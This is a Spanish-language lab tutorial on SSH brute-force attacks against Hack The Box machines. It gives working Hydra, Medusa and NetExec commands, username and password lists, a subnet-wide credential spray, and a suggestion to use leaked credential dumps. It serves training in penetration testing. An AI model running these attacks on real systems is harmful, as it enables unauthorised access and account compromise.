Volver al inicio
</>

Ataques SSH: Fuerza Bruta

Enumeración de Usuarios, Diccionarios y Herramientas de Ataque

¿Qué es un Ataque de Fuerza Bruta SSH?

Definición: Un ataque de fuerza bruta SSH es una técnica de penetración que consiste en intentar repetidamente diferentes combinaciones de nombres de usuario y contraseñas hasta encontrar credenciales válidas para el servicio SSH (Secure Shell). Este método explota contraseñas débiles y configuraciones inseguras para obtener acceso remoto no autorizado al sistema.

Requisitos para que sea exitoso:

  • Puerto SSH abierto y accesible (generalmente puerto 22)
  • Uso de contraseñas débiles o por defecto
  • Ausencia de rate limiting o protección anti-brute force
  • Lista de usuarios válidos (enumeración previa o usernames comunes)

Impacto: Acceso completo al sistema como usuario legítimo, ejecución remota de comandos, escalación de privilegios y movimiento lateral en la red.

Casos Prácticos: HTB Servenom y Writer

Ataque SSH con Hydra - HTB Servenom (10.10.10.184)
Escenario del ataque:
  • Target: HTB Servenom (10.10.10.184)
  • Puerto abierto: SSH 22/TCP
  • Herramientas: Hydra, listas de usuarios/passwords personalizadas
  • Resultado esperado: Credenciales válidas para acceso SSH

Metodología de Explotación:

1
Reconocimiento
Enumeración de puertos SSH y detección de versión
2
Recopilación de Usuarios
Obtención de usernames desde sitio web o enumeración
3
Preparación de Diccionarios
Creación de listas de usuarios y contraseñas objetivo
4
Ataque Brute Force
Ejecución de Hydra con listas múltiples
5
Validación y Acceso
Conexión SSH con credenciales encontradas

Fase 1: Reconocimiento del Servicio SSH

Nmap - Enumeración SSH
nmap -p 22 -sV -sC 10.10.10.184 # Output esperado: # 22/tcp open ssh OpenSSH 7.6p1 # | ssh-hostkey: # | 2048 aa:xx:xx... (RSA) # | 256 bb:yy:yy... (ECDSA) # Banner grabbing adicional nc 10.10.10.184 22

Fase 2: Recopilación de Usuarios Potenciales

Creación de listas
# Usuarios obtenidos de enumeración web cat > users.txt <<'EOF' admin administrator root user guest test kyle servenom www-data developer support EOF # Contraseñas comunes y específicas del target cat > passwords.txt <<'EOF' password 123456 admin root servenom password123 qwerty letmein welcome EOF

Fase 3: Ataque con Hydra

Hydra - Brute Force Attack
# Ataque con listas múltiples hydra -L users.txt -P passwords.txt ssh://10.10.10.184 -t 4 -V # Parámetros explicados: # -L users.txt: Lista de usuarios # -P passwords.txt: Lista de contraseñas # -t 4: 4 threads paralelos (no sobrecargar) # -V: Verbose output # ssh://target: Servicio y objetivo # Salida exitosa esperada: # [22][ssh] host: 10.10.10.184 login: kyle password: password123
Hydra SSH attack HTB Servenom
💥 Hydra SSH Brute Force - HTB Servenom: Ataque exitoso con Hydra contra el puerto SSH de la máquina Servenom (10.10.10.184) usando listas de usuarios y contraseñas personalizadas. Se muestra el progreso del ataque y la detección de credenciales válidas.

En este ejemplo, Hydra encontró credenciales válidas: kyle:password123 después de probar las combinaciones sistemáticamente.

Ataque Dirigido - HTB Writer (10.10.11.101)
Escenario específico:
  • Target: HTB Writer (10.10.11.101)
  • Usuario conocido: kyle (obtenido de enumeración web)
  • Estrategia: Usuario fijo + diccionario masivo
  • Diccionario: rockyou.txt (14M+ passwords)

Ataque Dirigido con Rockyou

Hydra - Diccionario masivo
# Localizar rockyou.txt locate rockyou.txt # /usr/share/wordlists/rockyou.txt # Descomprimir si está comprimido gunzip /usr/share/wordlists/rockyou.txt.gz # Ataque dirigido hydra -l kyle -P /usr/share/wordlists/rockyou.txt ssh://10.10.11.101 -t 4 -V -f # Parámetros adicionales: # -l kyle: Usuario específico (fijo) # -f: Detener al encontrar primera credencial válida # -P rockyou.txt: ~14 millones de contraseñas # Monitorear progreso hydra -l kyle -P /usr/share/wordlists/rockyou.txt ssh://10.10.11.101 -t 4 -V -f -s 22
Hydra rockyou attack HTB Writer kyle user
🎯 Ataque Dirigido HTB Writer: Ejecución de Hydra con usuario fijo "kyle" contra diccionario rockyou.txt en la máquina Writer (10.10.11.101). Se observa el proceso de fuerza bruta dirigida con más de 14 millones de contraseñas.

Validación de Credenciales

SSH Connection Test
# Conectar con credenciales encontradas ssh kyle@10.10.11.101 # Verificar acceso y permisos whoami id pwd sudo -l # Enumeración post-acceso ls -la /home/kyle/ cat /home/kyle/user.txt
SSH connection successful HTB Writer kyle
Conexión SSH Exitosa: Validación de las credenciales obtenidas mediante fuerza bruta. Se muestra el acceso SSH exitoso al usuario "kyle" en HTB Writer, confirmando la efectividad del ataque y el acceso al sistema objetivo.

El ataque con rockyou.txt puede tardar horas dependiendo de la posición de la contraseña en el diccionario. Considerar usar versiones optimizadas o filtradas para targets específicos.

Herramientas Alternativas y Técnicas Avanzadas

NetExec para entornos corporativos

NetExec SSH Bruteforce
# Ataque con NetExec (ex-CrackMapExec) netexec ssh 10.10.11.247 -u users.txt -p passwords.txt --verbose # Con credenciales específicas netexec ssh 10.10.11.247 -u admin -p password123 # Verificar múltiples targets netexec ssh 10.10.11.0/24 -u admin -p passwords.txt --threads 5
NetExec SSH brute force HTB Wifinetic
🏢 NetExec SSH Attack - HTB Wifinetic: Uso de NetExec (CrackMapExec) para ataques SSH en entornos corporativos contra la máquina Wifinetic (10.10.11.247). Se muestra el proceso de autenticación con listas múltiples de usuarios y contraseñas.

Medusa como alternativa a Hydra

Medusa SSH Attack
# Medusa syntax medusa -h 10.10.10.184 -U users.txt -P passwords.txt -M ssh -t 4 # Con usuario específico medusa -h 10.10.11.101 -u kyle -P rockyou.txt -M ssh -t 4 -f
NetExec SSH authentication successful
NetExec Authentication Success: Resultado exitoso del ataque NetExec SSH mostrando credenciales válidas encontradas. Se observa la confirmación de autenticación exitosa con indicadores visuales de acceso logrado al sistema objetivo.

Optimización de diccionarios

  • Filtrado por longitud: Eliminar passwords muy cortas/largas según política
  • Mangling rules: Aplicar variaciones (mayúsculas, números, años)
  • Target-specific wordlists: Crear diccionarios basados en la organización
  • Leaked passwords: Usar dumps de credenciales específicos del target

Consideraciones Éticas y Legales

Advertencia Legal: Este contenido es exclusivamente educativo. Los ataques de fuerza bruta son ilegales cuando se realizan sin autorización explícita. Úsalos solo en sistemas propios, laboratorios controlados o durante auditorías de seguridad autorizadas por contrato escrito.